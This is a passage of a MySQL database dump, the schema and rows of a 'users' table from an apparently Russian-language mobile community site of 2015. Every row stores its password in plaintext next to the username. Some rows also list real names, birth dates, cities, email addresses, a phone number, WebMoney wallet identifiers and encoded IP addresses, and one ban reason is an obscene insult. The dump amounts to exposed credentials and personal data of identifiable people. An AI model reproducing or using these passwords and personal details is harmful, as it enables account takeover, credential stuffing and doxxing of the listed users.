`user` char(20) NOT NULL DEFAULT '',
`pass` char(32) DEFAULT NULL,
`name` char(20) DEFAULT NULL,
`sex` smallint(1) DEFAULT '2',
`birth` char(10) DEFAULT NULL,
`date` char(10) DEFAULT NULL,
`avr` smallint(3) NOT NULL DEFAULT '300',
`max` smallint(2) NOT NULL DEFAULT '10',
`kik` int(20) NOT NULL DEFAULT '0',
`whokik` char(20) NOT NULL DEFAULT '',
`whykik` char(50) NOT NULL DEFAULT '',
`user_ip` char(20) NOT NULL DEFAULT '',
`user_soft` char(200) NOT NULL DEFAULT '',
`translit` tinyint(1) NOT NULL DEFAULT '0',
`latuser` char(30) NOT NULL DEFAULT '',
`onl` int(11) NOT NULL DEFAULT '0',
`room` char(10) NOT NULL DEFAULT '',
`level` int(11) NOT NULL DEFAULT '0',
`sistem_mes` smallint(2) NOT NULL DEFAULT '1',
`refresh` int(11) NOT NULL DEFAULT '15',
`city` char(20) NOT NULL,
`avka` smallint(2) NOT NULL DEFAULT '1',
`date_last` int(11) NOT NULL DEFAULT '0',
`on_time` int(11) NOT NULL DEFAULT '0',
`mod_reg` smallint(2) NOT NULL DEFAULT '0',
`img` char(50) NOT NULL,
`color` smallint(3) NOT NULL DEFAULT '0',
`onp_comments` int(11) NOT NULL DEFAULT '5',
`onp_files` int(11) NOT NULL DEFAULT '10',
`onp_albums` int(11) NOT NULL DEFAULT '5',
`onp_photos` int(11) NOT NULL DEFAULT '5',
`onp_favs` int(11) NOT NULL DEFAULT '10',
`onp_themes` int(11) NOT NULL DEFAULT '10',
`onp_privats` int(11) NOT NULL DEFAULT '5',
`onp_prevs` int(11) NOT NULL DEFAULT '80',
`p_mail` smallint(2) NOT NULL DEFAULT '1',
`p_wall` smallint(2) NOT NULL DEFAULT '1',
`p_r_wall` smallint(2) NOT NULL DEFAULT '1',
`p_date` smallint(2) NOT NULL DEFAULT '1',
`p_friends` smallint(2) NOT NULL DEFAULT '1',
`fr_lenta_files` smallint(2) NOT NULL DEFAULT '1',
`fr_lenta_photos` smallint(2) NOT NULL DEFAULT '1',
`fr_lenta_favs` smallint(2) NOT NULL DEFAULT '1',
`fr_lenta_friends` smallint(2) NOT NULL DEFAULT '1',
`comm_files` smallint(2) NOT NULL DEFAULT '1',
`comm_photos` smallint(2) NOT NULL DEFAULT '1',
`comm_forum` smallint(2) NOT NULL DEFAULT '1',
`comm_wall` smallint(2) NOT NULL DEFAULT '1',
`rating_limit` int(11) NOT NULL DEFAULT '0',
`my_lenta_files` smallint(2) NOT NULL DEFAULT '1',
`my_lenta_photos` smallint(2) NOT NULL DEFAULT '1',
`my_lenta_favs` smallint(2) NOT NULL DEFAULT '1',
`my_lenta_friends` smallint(2) NOT NULL DEFAULT '1',
`visit` char(20) NOT NULL,
`quest` smallint(1) NOT NULL DEFAULT '0',
`answer` char(20) NOT NULL,
`journalist` tinyint(1) NOT NULL DEFAULT '0',
`chat_filtr` tinyint(1) NOT NULL DEFAULT '0',
`icq` char(10) NOT NULL DEFAULT '0',
`email` char(30) NOT NULL,
`know` smallint(1) NOT NULL DEFAULT '0',
`rating_plus` int(11) NOT NULL DEFAULT '0',
`rating_minus` int(11) NOT NULL DEFAULT '0',
`wmid` char(12) NOT NULL DEFAULT '0',
`style` char(20) NOT NULL DEFAULT 'standart',
`room_post` int(11) NOT NULL DEFAULT '10',
`telefon` varchar(255) NOT NULL,
`narsh` int(11) DEFAULT NULL,
`kolnar` int(11) DEFAULT NULL,
`balans` float NOT NULL DEFAULT '0',
`status` text NOT NULL,
`vhod` int(11) DEFAULT '0',
`wmr` int(11) NOT NULL,
`kosh` char(12) NOT NULL,
`wmid_con` int(11) NOT NULL,
`ked` int(11) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=169 DEFAULT CHARSET=utf8 PACK_KEYS=0 ROW_FORMAT=DYNAMIC;
INSERT INTO users VALUES("1","Guest","","","0","","","0","0","0","","","2365591405","Mozilla/5.0","0","","1438157723","aut","0","0","0","","0","0","719","0","","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","29/07/15 11:15","0","","0","0","","","0","0","0","","","0","","0","0","0","","5","0","","0","0");
INSERT INTO users VALUES("94","xbit","12345ak","Владислав","2","","05-04-15","300","10","0","","","1433663708","Mozilla/5.0","0","xbit","1438155566","forum","5","1","15","","1","0","41627","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","29/07/15 10:39","0","","0","0","0","","0","2","0","0","standart","10","","","","134.2","","5","0","","1","0");
INSERT INTO users VALUES("95","Smertnik","zaqzaqqw","","0","","19-06-15","300","10","0","","","1385290785","Mozilla/5.0","0","smertnik","1434710940","error","0","1","15","","1","0","74","2","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","19/06/15 13:49","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("96","ЗэК","7777777z","","0","","19-06-15","300","10","0","","","2365590953","Opera/9.80","0","зэк","1437665513","forum","0","1","15","","1","0","8155","2","","1","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","23/07/15 18:31","0","","0","0","0","","0","0","0","0","standart","10","","","","9995","","0","0","","1","0");
INSERT INTO users VALUES("97","TeaM","zxcvbn","","0","","09-07-15","300","10","0","","","2834023278","Mozilla/5.0","0","team","1436538759","error","0","1","15","","1","0","278","2","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","10/07/15 17:32","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("98","betz","v73365777","","0","","09-07-15","300","10","0","","","2365590638","Mozilla/5.0","0","betz","1436469731","index","0","1","15","","1","0","128","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","09/07/15 22:22","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("99","Kasane_Teto","qwerty","","0","","09-07-15","300","10","0","","","1295292903","Mozilla/5.0","0","kasane_teto","1436469726","index","0","1","15","","1","0","33","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","09/07/15 22:22","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","5","0","","0","0");
INSERT INTO users VALUES("100","kr23dk","dadada","","0","","10-07-15","300","10","0","","","3648410095","Mozilla/5.0","0","kr23dk","1436498943","index","0","1","15","","1","0","3","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","10/07/15 06:29","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("101","Ticher","1adgjmptxtpmjgda","Ростислав","2","17.2.1997","10-07-15","300","10","0","","","1385290983","Nokia7230/5.0","0","ticher","1438070508","index","0","1","15","Полтава","1","0","2004","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","1436521727","1","1","1","1","28/07/15 11:01","0","","0","0","0","Script.G@yandex.ru","1","0","0","0","standart","10","","","","1","","2","0","","0","0");
INSERT INTO users VALUES("102","TheAlex","89198320964aA","","0","","10-07-15","300","10","0","","","2365590857","Mozilla/5.0","0","thealex","1437935338","forum","0","1","15","","1","0","350","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","26/07/15 21:28","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","2","0","","0","0");
INSERT INTO users VALUES("103","DarkMs","2222222q","","0","","10-07-15","300","10","0","","","1433663700","Mozilla/5.0","0","darkms","1436537845","index","0","1","15","","1","0","2","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","10/07/15 17:17","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("106","TAHK","731988k","","0","","11-07-15","300","10","0","","","3648410096","Mozilla/5.0","0","tahk","1436579965","index","0","1","15","","1","0","7","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","11/07/15 04:59","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("104","WEB_DESIGNER","password","","0","","10-07-15","300","10","0","","","3283974931","NokiaC3-00/5.0","0","web_designer","1436539335","error","0","1","15","","1","0","293","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","10/07/15 17:42","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","2","0","","0","0");
INSERT INTO users VALUES("105","Nravo","77777dd","","0","","10-07-15","300","10","0","","","2365591022","Mozilla/5.0","0","nravo","1437810091","index","0","1","15","","1","0","737","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","25/07/15 10:41","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("107","Troll","password","","0","","11-07-15","300","10","0","","","3283974927","NokiaC3-00/5.0","0","troll","1436604414","index","0","1","15","","1","0","6","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","11/07/15 11:46","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("108","MeXaHuK","qwerty","","0","","11-07-15","300","10","0","","","520982574","Mozilla/5.0","0","mexahuk","1436874347","forum","0","1","15","","1","0","57","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","14/07/15 14:45","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("109","Asadal","121212q","","0","","11-07-15","300","10","0","","","1318971278","Mozilla/5.0","0","asadal","1436607849","index","0","1","15","","1","0","135","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","11/07/15 12:44","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("110","Senusert","111111a","","0","","11-07-15","300","10","0","","","1604247922","Mozilla/5.0","0","senusert","1436875031","error","0","1","15","","1","0","898","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","14/07/15 14:57","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("111","kisher2","misha123","","0","","11-07-15","300","10","0","","","3648412511","Mozilla/5.0","0","kisher2","1436718396","error","0","1","15","","1","0","18","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","12/07/15 19:26","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("112","Aslanbek","aslan8938902","","0","","11-07-15","300","10","0","","","3103990070","Mozilla/5.0","0","aslanbek","1436631538","index","0","1","15","","1","0","182","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","11/07/15 19:18","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","1","0","","0","0");
INSERT INTO users VALUES("113","x332","zadira23","","0","","12-07-15","300","10","0","","","86900584","Mozilla/5.0","0","x332","1436723365","index","0","1","15","","1","0","54","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","12/07/15 20:49","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("114","cell","121212q","","0","","12-07-15","300","10","0","","","3168998530","Mozilla/5.0","0","cell","1436727825","index","0","1","15","","1","0","1","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","12/07/15 22:03","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("115","Anonymoyss","a123456","","0","","12-07-15","300","10","0","","","1433663597","Mozilla/5.0","0","anonymoyss","1436745143","index","0","1","15","","1","0","5009","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","13/07/15 02:52","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","5","0","","0","0");
INSERT INTO users VALUES("116","Atom","123456sa","","0","","13-07-15","300","10","0","","","3648413560","Mozilla/5.0","0","atom","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("117","Igel","7ewpcik9","Алексей","2","10.3.1997","13-07-15","300","10","0","","","1427815030","Mozilla/5.0","0","igel","1438158342","error","0","1","15","Краснодар","1","0","808","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","29/07/15 11:25","0","","0","0","212593404","Aleksey_Igel@mail.ru","4","0","0","834475086301","standart","10","79384210177","","","1","","0","0","707004717284","1","0");
INSERT INTO users VALUES("118","kreddy","aslan8938","","0","","13-07-15","300","10","0","","","3103990439","Mozilla/5.0","0","kreddy","1436973008","index","0","1","15","","1","0","506","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","15/07/15 18:10","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("119","Адский","qwerty123","","0","","14-07-15","300","10","0","","","93278310","Mozilla/5.0","0","адский","1436870513","error","0","1","15","","1","0","588","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","14/07/15 13:41","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","1","0","","0","0");
INSERT INTO users VALUES("120","Frank_Sorkut","bravewhite","","0","","14-07-15","300","10","0","","","1593315366","Mozilla/5.0","0","frank_sorkut","1437837233","index","0","1","15","","1","0","6064","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","25/07/15 18:13","0","","0","0","0","","0","0","0","0","standart","10","","","","0.1","","0","0","","0","0");
INSERT INTO users VALUES("122","chinya_cyber","427432chg","","0","","14-07-15","300","10","0","","","1314228807","Mozilla/5.0","0","chinya_cyber","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("121","рпрапр","111111a","","0","","14-07-15","300","10","0","","","2754103413","Opera/9.80","0","рпрапр","1436872151","forum","0","1","15","","1","0","287","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","14/07/15 14:09","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("123","4Matic","family12231723","","0","","14-07-15","300","10","0","","","2453842037","Mozilla/5.0","0","4matic","1436878994","error","0","1","15","","1","0","552","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","14/07/15 16:03","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("124","Tyron","serg123","","0","","14-07-15","300","10","0","","","2365590547","Mozilla/5.0","0","tyron","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","4","0","","0","0");
INSERT INTO users VALUES("125","Maxim","lera10","","0","","14-07-15","300","10","0","","","2365590810","Mozilla/5.0","0","maxim","1436897069","index","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","14/07/15 21:04","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("127","ND24","QWERTYUIOP","","0","","15-07-15","300","10","0","","","1539602878","Mozilla/5.0","0","nd24","1436971480","index","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","15/07/15 17:44","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("126","HaCK","70recrtbnr","","0","","14-07-15","300","10","0","","","772858185","Mozilla/5.0","0","hack","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("161","dinamko","dimitch","","0","","26-07-15","300","10","0","","","782544953","Mozilla/5.0","0","dinamko","1438011259","error","0","1","15","","1","0","157","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","27/07/15 18:34","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("128","Виталий","123qwerty","","0","","15-07-15","300","10","0","","","786795632","Mozilla/5.0","0","виталий","1437662575","forum","0","1","15","","1","0","870","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","23/07/15 17:42","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("129","Majdwmxm","mjgmjg","","0","","16-07-15","300","10","0","","","1385291321","Nokia202/20.52","0","majdwmxm","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("130","Mhack","qawsed","","0","","17-07-15","300","10","0","","","1541806401","Mozilla/5.0","0","mhack","1437133526","index","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","17/07/15 14:45","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("131","McLari","123456qq","","0","","18-07-15","300","10","2147483647","94","НАХУЙ ШЛА, ШАВКА","3169352764","Mozilla/5.0","0","mclari","1438095232","index","0","1","15","","1","0","866","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","28/07/15 17:53","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","4","0","","0","0");
INSERT INTO users VALUES("132","Gerakl_13","skrebets138","","0","","18-07-15","300","10","0","","","2956732461","Mozilla/5.0","0","gerakl_13","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("133","GanGuBaS","qaz123","","0","","19-07-15","300","10","0","","","784280785","Mozilla/5.0","0","gangubas","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("134","forsim","forsim","","0","","19-07-15","300","10","0","","","2365590947","Nokia301/2.0","0","forsim","1437366515","index","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","20/07/15 07:28","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","1","0","","0","0");
INSERT INTO users VALUES("135","bejsser","lol123","","0","","20-07-15","300","10","0","","","1533497272","Mozilla/5.0","0","bejsser","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("136","kamken","qwertyuiop","","0","","20-07-15","300","10","0","","","1123635674","Mozilla/5.0","0","kamken","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("137","testu","123123qwe","","0","","20-07-15","300","10","0","","","3105535525","Opera/9.80","0","testu","1437491849","index","0","1","15","","1","0","583","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","21/07/15 18:17","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("138","VarrkaN","LACRIMOSA","","0","","21-07-15","300","10","0","","","1412856707","Mozilla/5.0","0","varrkan","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("139","foxikama","maksim0990","","0","","21-07-15","300","10","0","","","1402283277","Mozilla/5.0","0","foxikama","1437454665","error","0","1","15","","1","0","219","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","21/07/15 07:57","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("148","EnCodeR","qwerty","","0","","22-07-15","300","10","0","","","1123638710","Mozilla/5.0","0","encoder","1437653921","index","0","1","15","","1","0","306","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","23/07/15 15:18","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("140","dinofob","Dinofob5813","","0","","21-07-15","300","10","0","","","1587159496","Mozilla/5.0","0","dinofob","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("141","ApsenT","qwerty","","0","","21-07-15","300","10","0","","","2994330482","Mozilla/5.0","0","apsent","1438088580","index","0","1","15","","1","0","1052","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","28/07/15 16:03","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("142","Engine","650893qwerty","","0","","21-07-15","300","10","0","","","1540215191","Mozilla/5.0","0","engine","1437895095","index","0","1","15","","1","0","36","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","26/07/15 10:18","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("143","example","123qwe","","0","","21-07-15","300","10","0","","","1385288648","Mozilla/5.0","0","example","1437475203","index","0","1","15","","1","0","1","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","21/07/15 13:40","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("144","den1arman","5561949arman","","0","","21-07-15","300","10","0","","","3588641761","Mozilla/5.0","0","den1arman","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","1","0","","0","0");
INSERT INTO users VALUES("145","Soc1","Qwerty123","","0","","21-07-15","300","10","0","","","2996293700","Mozilla/5.0","0","soc1","1437470255","index","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","21/07/15 12:17","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("146","fjsyb","qwerty123","","0","","21-07-15","300","10","0","","","2365590844","Mozilla/5.0","0","fjsyb","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("147","ultral","alexey","","0","","21-07-15","300","10","0","","","3283974192","Mozilla/5.0","0","ultral","1437482296","index","0","1","15","","1","0","763","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","21/07/15 15:38","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("149","hetag","terude28","","0","","22-07-15","300","10","0","","","2988644725","Mozilla/5.0","0","hetag","1437560185","index","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","22/07/15 13:16","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("150","Betz9","v73365777","","0","","22-07-15","300","10","0","","","2365590630","Mozilla/5.0","0","betz9","1438007200","index","0","1","15","","1","0","478","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","1437802209","1","1","1","1","27/07/15 17:26","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("151","FFantoMM","ru58str2","","0","","22-07-15","300","10","0","","","2365590704","NokiaX2-00","0","ffantomm","1437640808","index","0","1","15","","1","0","156","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","23/07/15 11:40","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("152","Виталичъ","vetal0","","0","","23-07-15","300","10","0","","","3105535118","Mozilla/5.0","0","виталичъ","1437648894","index","0","1","15","","1","0","500","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","23/07/15 13:54","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("153","MobiEx","1234qw","","0","","23-07-15","300","10","0","","","1489537330","Mozilla/5.0","0","mobiex","1438161416","index","0","1","15","","1","0","444","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","29/07/15 12:16","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("155","Noldor","qwer1234","","0","","24-07-15","300","10","0","","","529581938","Mozilla/5.0","0","noldor","1437838085","index","0","1","15","","1","0","821","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","25/07/15 18:28","0","","0","0","0","","0","0","0","0","standart","10","","","","0.1","","0","0","","0","0");
INSERT INTO users VALUES("156","akramjon22","akramjon22","","0","","25-07-15","300","10","0","","","1385290191","Mozilla/5.0","0","akramjon22","1437805067","index","0","1","15","","1","0","1","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","25/07/15 09:17","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("157","wamplady","963369az","","0","","25-07-15","300","10","0","","","1433663681","Mozilla/5.0","0","wamplady","0","","0","1","15","","1","0","0","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","1","0","","0","0");
INSERT INTO users VALUES("158","Temas","dadada","","0","","25-07-15","300","10","0","","","2365590763","NokiaX2-02/11.79","0","temas","1437857760","index","0","1","15","","1","0","96","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","25/07/15 23:56","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("159","sss1","liiminho1","","0","","26-07-15","300","10","0","","","521996056","Mozilla/5.0","0","sss1","1438024175","forum","0","1","15","","1","0","72","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","27/07/15 22:09","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("160","Kaban","dadada","","0","","26-07-15","300","10","0","","","2365590925","NokiaX2-02/11.79","0","kaban","1438066984","forum","0","1","15","","1","0","1589","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","28/07/15 10:03","0","","0","0","0","","0","0","0","0","standart","10","","","","0.1","","0","0","","0","0");
